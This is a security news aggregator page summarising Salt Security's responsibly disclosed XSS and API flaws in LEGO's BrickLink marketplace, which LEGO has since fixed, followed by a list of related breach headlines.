Security News > 2022 > December > LEGO BrickLink bugs let hackers hijack accounts, breach servers
Security analysts have discovered two API security vulnerabilities in BrickLink.com, LEGO Group's official second-hand and vintage marketplace for LEGO bricks.
BrickLink is the world's largest online community of LEGO fans, with over a million registered members.
Two API security issues discovered by Salt Security could have allowed an attacker to take over members' accounts, access and steal personally identifiable information stored on the platform, or even gain access to internal production data and compromise internal servers.
Salt Security's analysts discovered the vulnerabilities while experimenting with user input fields on the BrickLink website.
Using the target's Session ID exposed on a different page, an attacker could leverage the XSS flaw to hijack the session and take over the target's account.
The security researchers reported the discovered vulnerabilities to LEGO, and the company took action to fix all issues.
News URL
Related news
- Hackers lurked in Treasury OCC’s systems since June 2023 breach (source)
- CentreStack RCE exploited as zero-day to breach file sharing servers (source)
- Oracle says "obsolete servers" hacked, denies cloud breach (source)
- ASUS releases fix for AMI bug that lets hackers brick servers (source)
- Lazarus hackers breach six companies in watering hole attacks (source)
- Hackers Exploit Critical Craft CMS Flaws; Hundreds of Servers Likely Compromised (source)
- Commvault Confirms Hackers Exploited CVE-2025-3928 as Zero-Day in Azure Breach (source)
- Luna Moth extortion hackers pose as IT help desks to breach US firms (source)
- Chinese hackers behind attacks targeting SAP NetWeaver servers (source)
- Türkiye Hackers Exploited Output Messenger Zero-Day to Drop Golang Backdoors on Kurdish Servers (source)